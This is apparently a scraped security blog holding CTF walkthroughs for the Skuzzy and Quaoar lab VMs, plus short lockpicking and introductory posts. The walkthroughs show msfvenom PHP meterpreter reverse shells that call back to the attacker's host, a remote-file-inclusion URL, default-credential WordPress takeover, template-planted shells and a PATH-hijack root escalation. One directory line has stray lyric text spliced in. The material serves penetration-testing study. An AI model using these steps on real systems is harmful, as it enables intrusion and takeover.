---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/checking/ ----
                                                                                                                                                      ==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/checking/mode/
                                                                         
---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/checking/mode/ ----
                                                                                                                                                      ==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/checking/mode/trap/
+ http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/checking/mode/xmlrpc.php (CODE:200|SIZE:450)
                                                                         
---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/checking/mode/trap/ ----
                                                                                                                                                      ==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/checking/mode/trap/affiliates/
                                                                         
---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/checking/mode/trap/affiliates/ ----
                                                                                                                                                      ==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/checking/mode/trap/affiliates/dba/
                                                                         
---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/checking/mode/trap/affiliates/dba/ ----
                                                                                                                                                      ==> DIRECTORY: http://192.168.1.37/smblogin/custom-loI can see it in your eyes lyricsg/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/checking/mode/trap/affiliates/dba/program/
                                                                         
---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/checking/mode/trap/affiliates/dba/program/ ----
                                                                                                                                                      ==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/checking/mode/trap/affiliates/dba/program/font/
                                                                         
---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/checking/mode/trap/affiliates/dba/program/font/ ----
                                                                           + http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/checking/mode/trap/affiliates/dba/program/font/index.html (CODE:200|SIZE:527)
                                                                               
-----------------
END_TIME: Mon Mar 20 22:17:49 2017
DOWNLOADED: 119912 - FOUND: 3

As you see it found 3 directories, by looking those dirs I found some trolling like:

Troll1

And

Troll2

But this last one wasn’t sooo troll, by looking the source code:

Troll2

And by base64 decoding it I got some directions

Troll2

This was clearly saying to take a look to the other port, the iscsi one.

I never used this protocol and took me a while to realize how to connect to it. I must admit the service had no auth, otherwise I’ll be still trying to get in there.

Basically I had to install open-iscsi in order to connect. Started the service and tried to discover the portal:

root@pss:~/ctf/ew# service iscsid start
root@pss:~/ctf/ew# iscsiadm -m discoverydb -t st -p 192.168.1.37 
# BEGIN RECORD 2.0-874
discovery.startup = manual
discovery.type = sendtargets
discovery.sendtargets.address = 192.168.1.37
discovery.sendtargets.port = 3260
discovery.sendtargets.auth.authmethod = None
discovery.sendtargets.auth.username = <empty>
discovery.sendtargets.auth.password = <empty>
discovery.sendtargets.auth.username_in = <empty>
discovery.sendtargets.auth.password_in = <empty>
discovery.sendtargets.timeo.login_timeout = 15
discovery.sendtargets.use_discoveryd = No
discovery.sendtargets.discoveryd_poll_inval = 30
discovery.sendtargets.reopen_max = 5
discovery.sendtargets.timeo.auth_timeout = 45
discovery.sendtargets.timeo.active_timeout = 30
discovery.sendtargets.iscsi.MaxRecvDataSegmentLength = 32768
# END RECORD
root@pss:~/ctf/ew# iscsiadm -m discovery -t st -p 192.168.1.37 
192.168.1.37:3260,1 iqn.2017-02.local.skuzzy:storage.sys0

At this point I just needed to link the portal and mount it

root@pss:~/ctf/ew# iscsiadm -m node --targetname iqn.2017-02.local.skuzzy:storage.sys0 -p 192.168.1.37 --login
Logging in to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal: 192.168.1.37,3260] (multiple)
Login to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal: 192.168.1.37,3260] successful.
root@pss:~# mount /dev/sdb /mnt
root@pss:~# cd /mnt/

By listing the files I got something I was looking for!

root@pss:/mnt# ls
bobsdisk.dsk  flag1.txt  lost+found
root@pss:/mnt# cat flag1.txt 
Congratulations! You've discovered the first flag!

flag1{c0abc15976b98a478150c900ebb0c86f0327f4dd}

Let's see how you go with the next one...

Then, I needed to know what was that bobsdisk.dsk file. So I ran a file to it:

root@pss:/mnt# file bobsdisk.dsk 
bobsdisk.dsk: Linux rev 1.0 ext2 filesystem data, UUID=faef0c66-b61b-4d80-8c20-5e8da65345d4 (large files)

It’s a disk dump!, let’s see if I can mount it!

root@pss:/mnt# mkdir ~/ctf/ew/dsk
root@pss:/mnt# mount bobsdisk.dsk ~/ctf/ew/dsk/
root@pss:/mnt# cd ~/ctf/ew/dsk/
root@pss:~/ctf/ew/dsk# ls
lost+found  ToAlice.csv.enc  ToAlice.eml
root@pss:~/ctf/ew/dsk# less ToAlice.eml 
root@pss:~/ctf/ew/dsk# cat ToAlice.eml | grep flag
PPS: flag2{054738a5066ff56e0a4fc9eda6418478d23d3a7f}

I had my second flag!

The next step would be to know what the encrypted file data is. By looking closely to the ToAlice.eml file, we find everything we need to decrypt the encripted file as:

root@pss:~/ctf/ew/dsk# openssl aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ./decrypted.txt
enter aes-256-cbc decryption password:
root@pss:~/ctf/ew/dsk# ls
decrypted.txt  lost+found  ToAlice.csv.enc  ToAlice.eml
root@pss:~/ctf/ew/dsk# cat decrypted.txt 
Web Path,Reason
5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site! 
c2444910794e037ebd8aaf257178c90b,Nice clean well prepped site. Nothing of interest here.
flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?

So I had the third flag, and some web directories to look for:

The first one was just crap. :P

First Directory

The second one was different, some kind of CMS.

Second Directory

One of the URLs was loading content, more precisely this one: http://192.168.1.35/c2444910794e037ebd8aaf257178c90b/?p=reader&url=http://127.0.0.1/c2444910794e037ebd8aaf257178c90b/data.txt

I had a really bad time figuring out how to bypass that file.

I noticed that if I entered a URL different from 127.0.0.1 it asked for a key. And not only that, if you add a key parameter with some of the previous flags we found the message changed to say that the key was invalid.

After some time, I noticed the p param was loading plain files, for instance ?p=flag will load the flag.php file, so I tried to access the data.txt file directly.

Data txt file

The interesting part in here is that the starting and ending tags were ##php## instead of the conventional ones. Finally I found a way to bypass some sort of eval function by converting the file first to base64. That way the reader will only display the file content. Since I already knew about the ?p param I went for the flag.php file directly.

base64 encoded flag.php file

When decoding it I found the fourth flag!

base64 decoded flag.php file

flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}

So the next step is to get a shell! This step was somehow the easier in the whole CTF. I already knew a key parameter was needed to load external files. I also knew it had the flag format because or the error message change. I tried the flag4 as key and it was the right one!

So I created a php reverse shell with msfvenom

root@pss:~/ctf/ew# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.38 LPORT=6000 R > www/shell1.txt No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 948 bytes

I forgot I saw in the data.txt file it was using a weird opening/closing tags, like ##php## instead of the standard ones. I edited the shell.php file and tried again.

And I published with python as:

root@pss:~/ctf/ew/www# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Then from msfconsole I prepared myself to get the shell! :P

root@pss:~/ctf/ew/www# msfconsole 
                                                  

                 _---------.
             .' #######   ;."
  .---,.    ;@             @@`;   .---,..
." @@@@@'.,'@@            @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'
     "--'.@@@  -.@        @ ,'-   .'--"
          ".@' ; @       @ `.  ;'
            |@@@@ @@@     @    .
             ' @@@ @@   @@    ,
              `.@@@@    @@   .
                ',@@     @   ;           _____________
                 (   3 C    )     /|___ / Metasploit! \
                 ;@'. __*__,."    \|--- \_____________/
                  '(.,...."/


Love leveraging credentials? Check out bruteforcing
in Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.13.21-dev                         ]
+ -- --=[ 1621 exploits - 924 auxiliary - 282 post        ]
+ -- --=[ 472 payloads - 39 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/multi/handler 
msf exploit(handler) > set LHOST 192.168.1.38
LHOST => 192.168.1.38
msf exploit(handler) > set LPORT 6000
LPORT => 6000
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > set payload php/meterInterrupt: use the 'exit' command to quit
msf exploit(handler) > Interrupt: use the 'exit' command to quit
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.38     yes       The listen address
   LPORT  6000             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.1.38:6000 
[*] Starting the payload handler...
[*] Sending stage (33986 bytes) to 192.168.1.35
[*] Meterpreter session 1 opened (192.168.1.38:6000 -> 192.168.1.35:44034) at 2017-03-21 10:40:34 -0300

meterpreter > sysinfo
Computer    : skuzzy
OS          : Linux skuzzy 4.4.0-64-generic #85-Ubuntu SMP Mon Feb 20 11:50:30 UTC 2017 x86_64
Meterpreter : php/linux
meterpreter > 

I got session as soon as I hit the CTF VM with the following url

http://192.168.1.35/c2444910794e037ebd8aaf257178c90b/?p=reader&key=flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}&url=http://192.168.1.38/shell1.txt

After getting trolled and trolled, and kicked and trolled, I got to /opt

Listing: /opt
=============

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
104755/rwxr-xr-x  8736  fil   2017-03-02 09:28:40 -0300  alicebackup

meterpreter > shell
Process 1967 created.
Channel 4 created.
./alicebackup
uid=0(root) gid=0(root) groups=0(root),33(www-data)
ssh: Could not resolve hostname alice.home: Name or service not known
lost connection

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

ssh alice.home
Pseudo-terminal will not be allocated because stdin is not a terminal.
ssh: Could not resolve hostname alice.home: Name or service not known

By reading the ./alicebackup binary output, we can see it’s trying to run 2 commands, id and ssh. I did also run them so you can check the outputs are the same.

What we will need to get root is to update the path by injecting our id or ssh commands with a shell. Since alicebackup prints like it’s running id as root, I’ll tried replacing id first.

When running alicebackup again instead of running id as root, it’ll run sh as root giving me a root shell.

The following are just the commands secuence to get root and get the latest flag!

cd /tmp
cp /bin/sh id
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
export PATH=/tmp:$PATH
echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
cd /opt
./alicebackup


whoami
root
cd /root
ls -la
total 24
drwx------  3 root root 4096 Mar  2 22:36 .
drwxr-xr-x 23 root root 4096 Feb 28 06:51 ..
-rw-r--r--  1 root root 3106 Oct 23  2015 .bashrc
-rw-r--r--  1 root root  148 Aug 18  2015 .profile
drwx------  2 root root 4096 Mar  2 22:36 .ssh
-rw-r--r--  1 root root  493 Mar  2 22:04 flag.txt
cat flag.txt
Congratulations!

flag5{42273509a79da5bf49f9d40a10c512dd96d89f6a}

You've found the final flag and pwned this CTF VM!

I really hope this was an enjoyable challenge, and that my trolling and messing with you didn't upset you too much! I had a blast making this VM, so it won't be my last!

I'd love to hear your thoughts on this one.
Too easy?
Too hard?
Too much stuff to install to get the iSCSI initiator working?

Drop me a line on twitter @vortexau, or via email vortex@juicedigital.net

I found this VM really funny and challenging. The 2 steps that were really hard to solve was the iscsi service and the filtering to base64 on the php portal. Also, I’ve learned a lot with this, mainly because of the trolling and a lot of false positives or false clues set. Like the scripts to Seinfeld

The soup nazi

My top 3 youtube lockpicking channels

This will be a really short and simple post, just to let you know guys which are my favorite youtube channels in regards to lockpicking.

Just by following and watching their videos you’ll learn a lot, not only on different techniques but also the features each lock and lock picking brand offers.

In a future post, I’ll introduce you to the set of locks and picks I use to practice my lockpicking skills.

Hackfest2016 Quaoar Walkthrough

Today I took some time to complete a simple CTF from VulnHub called Quaoar. In the links you can find all the info about how to get this CTF VM.

I downloaded the vm file and opened it with VirtualBox. I started with an nmap command, not only to find new machines on my network but also to know its services:

nmap -sV 192.168.1.0/24

And I found:

Nmap scan report for 192.168.1.37
Host is up (0.040s latency).
Not shown: 991 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
53/tcp  open  domain      ISC BIND 9.8.1-P1
80/tcp  open  http        Apache httpd 2.2.22 ((Ubuntu))
110/tcp open  pop3        Dovecot pop3d
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
993/tcp open  ssl/imap    Dovecot imapd
995/tcp open  ssl/pop3    Dovecot pop3d
MAC Address: 2C:F0:EE:30:40:BE (Apple)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Then, my second step was to check on the HTTP server..

Quaoar Hack The Planet

I tried downloading both images and extracting their metadata.. no luck.

I continued by taking a closer look to the server with nikto, and this is what I found:

# nikto -host http://192.168.1.37
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.37
+ Target Hostname:    192.168.1.37
+ Target Port:        80
+ Start Time:         2017-03-20 18:33:20 (GMT-3)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, inode: 133975, size: 100, mtime: Mon Oct 24 01:00:10 2016
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3
+ Entry '/wordpress/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wordpress/: A Wordpress installation was found.
+ 8348 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2017-03-20 18:34:08 (GMT-3) (48 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

First I tried hitting http://192.168.1.37/icons/README with no luck. A plain txt with no apparent value popped out.

Then I tried the ever popular wordpress directory. Yes! we have a running installation, it also seems to be the default one!

Wordpress install

We all know the wp-admin folder!, let’s just try admin/admin. Whoooaaa, I was in!

Wordpress default passwords

Ok, now, by having access to the wordpress file manager, I can just drop a meterpreter in there and get a reverse shell.

I created a php file with the meterpreter payload as shown in the following image:

Meterpreter

Then I added the shell code to the 404 page using the wordpress theme editor.

Editor

I started msfconsole and set up the listener. Once I finished, I just forced a 404 error on wordpress by fetching an unexisting post id.

msf > use exploit/multi/handler 
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.38
LHOST => 192.168.1.38
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.38     yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > exploit 

[*] Started reverse TCP handler on 192.168.1.38:4444 
[*] Starting the payload handler...
[*] Sending stage (33986 bytes) to 192.168.1.37
[*] Meterpreter session 1 opened (192.168.1.38:4444 -> 192.168.1.37:40345) at 2017-03-20 19:12:40 -0300

meterpreter > sysinfo
Computer    : Quaoar
OS          : Linux Quaoar 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686
Meterpreter : php/linux
meterpreter > pwd
/var/www/wordpress
meterpreter > ls
Listing: /var/www/wordpress
===========================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100644/rw-r--r--  418    fil   2016-10-26 21:45:26 -0300  index.php
100644/rw-r--r--  19930  fil   2016-10-26 21:45:26 -0300  license.txt
100644/rw-r--r--  7195   fil   2016-10-26 21:45:26 -0300  readme.html
100644/rw-r--r--  4896   fil   2016-10-26 21:45:26 -0300  wp-activate.php
40755/rwxr-xr-x   4096   dir   2016-10-26 21:45:26 -0300  wp-admin
100644/rw-r--r--  271    fil   2016-10-26 21:45:26 -0300  wp-blog-header.php
100644/rw-r--r--  4818   fil   2016-10-26 21:45:26 -0300  wp-comments-post.php
100644/rw-r--r--  3087   fil   2016-10-26 21:45:26 -0300  wp-config-sample.php
100666/rw-rw-rw-  3441   fil   2016-11-30 02:02:01 -0300  wp-config.php
40755/rwxr-xr-x   4096   dir   2016-10-26 21:45:26 -0300  wp-content
100644/rw-r--r--  2932   fil   2016-10-26 21:45:26 -0300  wp-cron.php
40755/rwxr-xr-x   4096   dir   2016-10-26 21:45:26 -0300  wp-includes
100644/rw-r--r--  2380   fil   2016-10-26 21:45:26 -0300  wp-links-opml.php
100644/rw-r--r--  2359   fil   2016-10-26 21:45:26 -0300  wp-load.php
100644/rw-r--r--  33609  fil   2016-10-26 21:45:26 -0300  wp-login.php
100644/rw-r--r--  8235   fil   2016-10-26 21:45:26 -0300  wp-mail.php
100644/rw-r--r--  11070  fil   2016-10-26 21:45:26 -0300  wp-settings.php
100644/rw-r--r--  25665  fil   2016-10-26 21:45:26 -0300  wp-signup.php
100644/rw-r--r--  4026   fil   2016-10-26 21:45:26 -0300  wp-trackback.php
100644/rw-r--r--  3032   fil   2016-10-26 21:45:26 -0300  xmlrpc.php

I got a shell to the server, the only problem was that I was running into the server process with almost no privileges. I did a cat wp-config.php to see if there where any DB credentials that could help and I found:

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');

Sooooo, let’s remember the port 22 was opened! I’ll try to ssh in with those credentials.

Bingo! I’m in as root!

Getting root access

So I’ve completed 2 of the 3 flags for this VM, I just need to find wich is the post-exploitation vulnerability.

By detailed listing the root home I found a flag:

Getting root access

I searched the flag but no info was leaked (at least by trying a reverse search on crackstation).

Then, by looking the .lesshst file I got an idea: search the entire filesystem for flag.txt files!

Searching for flags clue

Found 2 flags in total. None of them leaked info on crackstation.

Global search

I when ahead for more on the home dir, but that was all

home directory

To be honest, I’m not sure if there is something more to take advantage of, maybe wordpress users credentials?

But by getting root access and finding another unexpected flag I feel like this CTF is complete!

Booting up

This is the first post in the lab, a first intent to view content and also a way to get to know how the Jekyll platform works.

It’s the start, the booting process. By know there are some interests that I’d like to write about.

  • Crypto and crypto attacks. Well, it’s like really really simple, if you try something outside the standards and the standards implementation chances are you are vulnerable. Crypto errors are like the new buffer overflow errors we’ve exploited.
  • CTF Walkthroughs. CTFs are fun games and a sort of reality check when talking about pentesting. If you are having problems to own a Virtual Machine created to be owned, that means containing vulnerable software installations and configurations, and, also giving any sort of clues of how to “solve” or get to the next flag. You will feel like on hell when trying to pentest a real scenario, where one or more specialists have put effort on securing all boxes.
  • Tools I’ve used and/or created. As a way to share knowledge and process.
  • Some other attacks I find really interesting but I’ve left them for a future like wireless attacks and hardware hacking, lockpicking, in-site attacks (raspberrys, homemade antennas, bad usbs, etc) and social engineering.

Let’s keep booting and see you soon!